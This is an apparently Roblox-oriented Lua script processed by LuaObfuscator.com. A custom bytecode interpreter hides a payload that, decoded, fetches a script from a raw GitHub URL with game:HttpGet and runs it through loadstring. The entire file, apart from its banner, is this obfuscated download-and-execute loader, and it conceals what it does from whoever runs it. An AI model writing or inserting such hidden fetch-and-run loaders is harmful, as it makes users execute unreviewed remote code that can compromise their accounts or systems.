--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v82,v19);v19=nil;v89=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -(1638 -(1523 + 114))))) + 1)) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=931 -(857 + 74) ;local v85;while true do if (v84==(568 -(367 + 201))) then v85=((835 + 94) -((304 -90) + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -((1347 -(68 + 997)) + 595)) ;end end end end local function v21() local v34=(2227 -(892 + 65)) -(226 + 1044) ;local v35;while true do if (v34==((9 -5) -3)) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v37 * 256) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + ((260 + 93) -(87 + 263)) );v18=v18 + (184 -(67 + 113)) ;return (v41 * (12302277 + 4474939)) + (v40 * (260471 -194935)) + (v39 * (628 -372)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=(1685 -732) -(802 + 150) ;local v45=(v20(v43,2 -1 ,36 -16 ) * (((440 -(145 + 293)) + 0)^((1459 -(44 + 386)) -(915 + 82)))) + v42 ;local v46=v20(v43,(1545 -(998 + 488)) -38 ,7 + 12 + 12 );local v47=((v20(v43,41 -9 )==(1188 -(1069 + 97 + 21))) and  -(2 -1)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * 0 ;else local v91=0 + 0 ;while true do if (v91==(791 -(368 + 423))) then v46=3 -2 ;v44=18 -(10 + 8) ;break;end end end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((443 -((1188 -(201 + 571)) + 26))/0))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((6 -4)^(23 + (1167 -(116 + 1022)))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;local v50={};for v65=1 + 0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 1721 -(345 + 1376) ;end)();while true do if (v67~=(689 -(198 + 490))) then else if (v51~=(4 -3)) then else local v97=(function() return 0;end)();while true do if (2==v97) then v51=(function() return 2;end)();break;end if (v97==(0 -0)) then v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v97=(function() return 1;end)();end if (v97~=1) then else v58=(function() return {};end)();for v100= #"{",v57 do local v101=(function() return 0 -0 ;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v101==1) then v104=(function() return nil;end)();while true do if (v102~=0) then else local v171=(function() return 1262 -(1091 + 171) ;end)();local v172=(function() return;end)();while true do if (v171==(0 + 0)) then v172=(function() return 0;end)();while true do if (v172==0) then v103=(function() return v21();end)();v104=(function() return nil;end)();v172=(function() return 3 -2 ;end)();end if (v172~=(3 -2)) then else v102=(function() return 375 -(123 + 251) ;end)();break;end end break;end end end if (v102~=(4 -3)) then else if (v103== #"\\") then v104=(function() return v21()~=0 ;end)();elseif (v103==2) then v104=(function() return v24();end)();elseif (v103~= #"asd") then else v104=(function() return v25();end)();end v58[v100]=(function() return v104;end)();break;end end break;end if (v101==0) then v102=(function() return 0;end)();v103=(function() return nil;end)();v101=(function() return 699 -(208 + 490) ;end)();end end end v97=(function() return 1 + 1 ;end)();end end end break;end if (v67==0) then local v92=(function() return 0;end)();while true do if (v92~=(0 + 0)) then else if (v51~=(836 -(660 + 176))) then else local v98=(function() return 0;end)();while true do if (0~=v98) then else v52=(function() return function(v161,v162,v163) local v164=(function() return 0;end)();local v165=(function() return;end)();while true do if (v164==0) then v165=(function() return 0 + 0 ;end)();while true do if (v165==(202 -(14 + 188))) then v161[v162-#"[" ]=(function() return v163();end)();return v161,v162,v163;end end break;end end end;end)();v53=(function() return {};end)();v98=(function() return 676 -(534 + 141) ;end)();end if (v98~=1) then else v54=(function() return {};end)();v55=(function() return {};end)();v98=(function() return 1 + 1 ;end)();end if (v98==2) then v51=(function() return 1;end)();break;end end end if (v51~=2) then else v56[ #"19("]=(function() return v21();end)();for v105= #"~",v23() do local v106=(function() return v21();end)();if (v20(v106, #",", #"|")~=0) then else local v121=(function() return 0;end)();local v122=(function() return;end)();local v123=(function() return;end)();local v124=(function() return;end)();while true do if (v121==2) then if (v20(v123, #".", #"~")~= #"!") then else v124[2 + 0 ]=(function() return v58[v124[2 + 0 ]];end)();end if (v20(v123,3 -1 ,2)== #">") then v124[ #"-19"]=(function() return v58[v124[ #"asd"]];end)();end v121=(function() return 4 -1 ;end)();end if (v121==(8 -5)) then if (v20(v123, #"91(", #"xxx")== #"[") then v124[ #"0836"]=(function() return v58[v124[ #"?id="]];end)();end v53[v105]=(function() return v124;end)();break;end if (v121==(1 + 0)) then v124=(function() return {v22(),v22(),nil,nil};end)();if (v122==(0 + 0)) then local v180=(function() return 0;end)();local v181=(function() return;end)();while true do if ((396 -(115 + 281))==v180) then v181=(function() return 0 -0 ;end)();while true do if (0==v181) then v124[ #"-19"]=(function() return v22();end)();v124[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v122== #"\\") then v124[ #"asd"]=(function() return v23();end)();elseif (v122==2) then v124[ #"xxx"]=(function() return v23() -((2 + 0)^(38 -22)) ;end)();elseif (v122== #"asd") then local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (v187==(0 -0)) then v188=(function() return 867 -(550 + 317) ;end)();while true do if (v188~=(0 -0)) then else v124[ #"-19"]=(function() return v23() -(2^(22 -6)) ;end)();v124[ #".dev"]=(function() return v22();end)();break;end end break;end end end v121=(function() return 5 -3 ;end)();end if (0~=v121) then else local v169=(function() return 285 -(134 + 151) ;end)();while true do if (v169==1) then v121=(function() return 1666 -(970 + 695) ;end)();break;end if (v169==(0 -0)) then v122=(function() return v20(v106,2, #"91(");end)();v123=(function() return v20(v106, #".com",6);end)();v169=(function() return 1;end)();end end end end end end for v107= #">",v23() do v54,v107,v28=(function() return v52(v54,v107,v28);end)();end return v56;end v92=(function() return 1;end)();end if (v92~=(1991 -(582 + 1408))) then else v67=(function() return 3 -2 ;end)();break;end end end end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[2 -0 ];local v64=v59[11 -(16 -8) ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1825 -((1260 -(30 + 35)) + 629) ;local v73= -(1 -0);local v74={};local v75={...};local v76=v12("#",...) -(781 -(162 + 618)) ;local v77={};local v78={};for v86=0 + 0 ,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 + 0 ];end end local v79=(v76-v70) + (1 -0) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 -0 ];if (v81<=(1 + 10)) then if (v81<=5) then if (v81<=(1638 -(944 + 429 + 263))) then if ((v81<=(1000 -(451 + 549))) or (1804>=3275)) then v72=v80[1 + 2 ];elseif ((v81==(1 -(1257 -(1043 + 214)))) or (1417>3629)) then local v125=v80[7 -5 ];local v126=v78[v80[4 -1 ]];v78[v125 + (1385 -(746 + 638)) ]=v126;v78[v125]=v126[v80[2 + 2 ]];else for v149=v80[2 -0 ],v80[344 -(218 + 123) ] do v78[v149]=nil;end end elseif ((4795>402) and (v81<=((2796 -(323 + 889)) -(1535 + 46)))) then v78[v80[2]]=v78[v80[(7 -4) + (580 -(361 + 219)) ]];elseif (v81==(1 + (323 -(53 + 267)))) then v78[v80[2]]();else v78[v80[562 -(306 + 58 + 196) ]]=v61[v80[1 + 2 ]];end elseif ((4813>3565) and (v81<=(15 -7))) then if (v81<=(1473 -(899 + 568))) then v78[v80[2 + 0 ]]=v80[3];elseif ((3912==3912) and (v81>7)) then local v132=v80[4 -2 ];local v133,v134=v71(v78[v132](v13(v78,v132 + (604 -(268 + 335)) ,v80[293 -(60 + 230) ])));v73=(v134 + v132) -(573 -(426 + 146)) ;local v135=0 + (413 -(15 + 398)) ;for v151=v132,v73 do v135=v135 + 1 ;v78[v151]=v133[v135];end else v78[v80[1458 -(282 + 1174) ]]=v78[v80[814 -(569 + 242) ]];end elseif ((2821<=4824) and (v81<=(25 -16))) then local v113=0 + 0 ;local v114;local v115;while true do if ((1738<=2195) and (v113==(1025 -(706 + 318)))) then v78[v114 + (1252 -(721 + 530)) ]=v115;v78[v114]=v115[v80[1275 -(945 + 326) ]];break;end if (((982 -(18 + 964)) -(0 -0))==v113) then v114=v80[2];v115=v78[v80[3 + 0 ]];v113=1;end end elseif (v81>10) then for v159=v80[702 -(271 + 429) ],v80[3 + 0 ] do v78[v159]=nil;end elseif (v78[v80[2]]==v80[1504 -(1408 + 92) ]) then v72=v72 + (1087 -(461 + 625)) ;else v72=v80[1291 -(993 + 295) ];end elseif ((41<=3018) and (v81<=(1 + 16))) then if ((2145<=4104) and (v81<=(1185 -(243 + 175 + 753)))) then if ((2689<4845) and (v81<=(5 + 7))) then v72=v80[1 + 2 ];elseif (v81>(4 + 9)) then v78[v80[2 + 0 ]]={};else local v139=0 + 0 ;local v140;local v141;local v142;local v143;while true do if (v139==(530 -((1256 -(20 + 830)) + 123))) then v73=(v142 + v140) -(1770 -(1749 + 20)) ;v143=0 + 0 + 0 ;v139=1324 -(1249 + 73) ;end if ((2==v139) or (2322>2622)) then for v174=v140,v73 do v143=v143 + 1 + 0 ;v78[v174]=v141[v143];end break;end if (v139==(1145 -(466 + 679))) then v140=v80[(130 -(116 + 10)) -2 ];v141,v142=v71(v78[v140](v13(v78,v140 + (2 -1) ,v80[1903 -(106 + 1794) ])));v139=1;end end end elseif (v81<=(5 + 10)) then local v117=v80[2];v78[v117]=v78[v117](v13(v78,v117 + 1 ,v73));elseif ((v81==(5 + 11)) or (4534==2082)) then v78[v80[(1 + 4) -(741 -(542 + 196)) ]]=v61[v80[7 -4 ]];else do return;end end elseif (v81<=20) then if (v81<=18) then v78[v80[116 -(4 + 110) ]]();elseif (v81>(603 -(57 + 527))) then if (v78[v80[1429 -((87 -46) + 1386) ]]==v80[4]) then v72=v72 + (104 -(17 + 86)) ;else v72=v80[3 + 0 ];end else v78[v80[3 -1 ]]={};end elseif (v81<=(60 -39)) then local v119=v80[168 -(36 + 86 + 44) ];v78[v119]=v78[v119](v13(v78,v119 + 1 ,v73));elseif (v81>((19 + 18) -15)) then v78[v80[6 -4 ]]=v80[3];else do return;end end v72=v72 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!053Q00028Q0003513Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D722D4461726B2D76322F507572706C652F726566732F68656164732F6D61696E2F4B6F6B6F2D7468652D6D697374030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657400104Q000E7Q001206000100014Q000B000200023Q00260A000100030001000100040C3Q00030001001206000200023Q001210000300033Q001210000400043Q0020010004000400052Q0003000600024Q000D000400064Q001500033Q00022Q000400030001000100040C3Q000F000100040C3Q000300012Q00163Q00017Q00",v9(),...);
